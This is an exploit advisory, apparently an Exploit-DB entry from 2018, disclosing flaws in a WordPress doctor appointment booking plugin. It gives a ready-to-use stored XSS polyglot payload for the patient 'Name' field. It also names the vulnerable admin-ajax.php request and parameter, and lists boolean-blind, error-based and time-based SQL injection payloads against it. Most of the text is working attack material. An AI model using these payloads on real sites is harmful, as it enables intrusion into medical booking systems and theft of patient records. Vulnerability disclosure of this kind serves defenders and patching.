# Exploit Title: Wordpress Doctor Appointment Booking Plugin v1.0.0 - SQL Injection / XSS
# Date: 2018-01-01
# Exploit Author: 8bitsec
# Vendor Homepage: https://codecanyon.net/
# Software Link: https://codecanyon.net/item/doctor-appointment-booking-wordpress-plugin/21215314
# Version: 1.0.0
# Tested on: [Kali Linux 2.0 | Mac OS 10.13.3]
# Email: contact@8bitsec.io
# Contact: https://twitter.com/_8bitsec

Release Date:
=============
2018-01-01

Product & Service Introduction:
===============================
Doctor Appointment Booking Plugin

Technical Details & Description:
================================

Authenticated Stored XSS vulnerability found.

Proof of Concept (PoC):
=======================

Authenticated Stored XSS:

Patients > Edit Patient. Write the payload on the 'Name' input field:
john doejaVasCript:/*-/*`/*\\`/*\'/*\"/**/(/* */oNcliCk=alert() )
The payload will execute when the field is clicked.

SQL Injection:

On [param1] parameter.

https://localhost/[path]/wp-admin/admin-ajax.php
POST: action=ctmdc&page=modal-patient-profile&task=load_modal_page&param1=11

Parameter: param1 (POST)
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: action=ctmdc&page=modal-patient-profile&task=load_modal_page&param1=11 AND 6200=6200

    Type: error-based
    Title: MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR)
    Payload: action=ctmdc&page=modal-patient-profile&task=load_modal_page&param1=11 AND (SELECT 9175 FROM(SELECT COUNT(*),CONCAT(0x716b6b7871,(SELECT (ELT(9175=9175,1))),0x716a6a7a71,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a)

    Type: AND/OR time-based blind
    Title: MySQL >= 5.0.12 AND time-based blind
    Payload: action=ctmdc&page=modal-patient-profile&task=load_modal_page&param1=11 AND SLEEP(5)

==================
8bitsec - [https://twitter.com/_8bitsec]